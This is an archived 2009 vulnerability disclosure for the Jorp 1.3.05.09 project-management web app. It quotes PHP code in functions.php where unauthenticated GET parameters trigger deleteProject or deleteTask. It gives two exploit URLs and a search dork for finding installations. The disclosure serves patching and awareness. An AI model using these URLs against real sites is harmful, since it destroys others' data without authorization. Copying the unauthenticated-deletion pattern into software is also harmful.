Lucene search
K

Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities

🗓️ 20 May 2009 00:00:00Reported by YEnH4ckErType 
zdt
 zdt
🔗 0day.today👁 44 Views

Remote Arbitrary Remove Projects/Tasks Vulnerabilities in Jorp 1.3.05.0

Code
=====================================================================
Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities
=====================================================================


----------------------------------------------------------------------------------------------
|       	   	   (GET vars 'x' & 'y') ADMIN FUNCTION EXECUTION	     	     |
|--------------------------------------------------------------------------------------------|
|                         	| 	  Jorp v-1.3.05.09       |		 	     |
|  CMS INFORMATION:		 --------------------------------		             |
|										             |
|-->WEB: http://jorp.sourceforge.net/           				             |
|-->DOWNLOAD: http://jorp.sourceforge.net/			            	             |
|-->DEMO: http://jorp.short-stack.net/demo/						     |
|-->CATEGORY: Project Management							     |
|-->DESCRIPTION: Jorp is a simple, web-based project management system.		       	     |
|		It allows you to keep track of projects, tasks, clients,...		     |
|-->RELEASED: 2009-05-07								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: "2009 Jorp"								             |
|-->CATEGORY: ADMIN FUNCTION EXECUTION						             |
|-->AFFECT VERSION: 1.3.05.09 (maybe <= ?)			 			     |
|-->Discovered Bug date: 2009-05-09							     |
|-->Reported Bug date: 2009-05-09							     |
|-->Fixed bug date: 2009-05-12								     |
|-->Info patch: http://jorp.sourceforge.net/					             |
|-->Author: YEnH4ckEr									     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


##############################
//////////////////////////////

ADMIN FUNCTION EXECUTION:

/////////////////////////////
##############################


Description: it's possible to remove Projects and Tasks remotely (without admin account).


-----------
FILE VULN:
-----------

Description: GET var 'x' injects the function deleteProject or deleteTask and GET var 'y' points to
ID.

Path --> [HOME_PATH]/functions.php

Lines --> 5-18

Code:

...

if (isset($_GET['x'])){	
	$x=$_GET['x'];	
}	
if (isset($_GET['y'])){		
	$y=$_GET['y'];	}	
if ($x == 'deleteProject')		
	deleteProject($y);	
else if ($x == 'deleteTask')		
	deleteTask($y);
...

---------
EXPLOIT:
---------


--->http://[HOST]/[HOME_PATH]/functions.php?x=deleteProject&y=[ID]

--->http://[HOST]/[HOME_PATH]/functions.php?x=deleteTask&y=[ID]




#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation